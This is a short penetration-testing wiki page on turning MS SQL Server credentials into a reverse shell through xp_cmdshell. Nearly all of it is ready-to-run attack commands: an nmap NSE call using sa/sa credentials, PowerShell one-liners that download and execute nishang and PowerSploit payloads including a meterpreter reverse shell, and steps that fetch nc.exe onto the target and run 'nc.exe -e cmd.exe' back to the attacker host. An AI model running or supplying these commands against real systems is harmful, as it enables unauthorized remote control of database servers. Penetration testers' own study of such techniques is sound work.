๐Ÿ” How to get a xp_cmdshell reverse shell

Penetration Testing Wiki

๐Ÿ” How to get a xp_cmdshell reverse shell

xp_cmdshell reverse shell

In a pentesting engagement, if you got the credentials of the MS SQL SERVER you can easily execute any command on the database server with nmap NSE script, ms-sql-xp-cmdshell:



nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="whoami" $IP

You have to substitute the following parameters of the above command:

  • mssql.username
  • mssql.password
  • ms-sql-xp-cmdshell.cmd

If you want to execute a reverse shell to connect back to your machine, you can use any of the Windows Powershell post exploitation frameworks.

xp_cmdshell with nishang

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

xp_cmdshell with Powersploit

powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1');\ Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

xp_cmdshell with nc

First we need to download nc to the target machine (192.168.1.10) from our machine (192.168.1.3):

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="powershell.exe wget http://192.168.1.3/nc.exe -OutFile c:\\Users\Public\\nc.exe" 192.168.1.10

Now we can execute the reverse shell:

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="c:\\Users\Public\\nc.exe -e cmd.exe 192.168.1.3 4444" 192.168.1.10

More info in the following sections:

SQL Exploitation section
Powershell frameworks for Post-exploitation

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 1

No votes so far! Be the first to rate this post.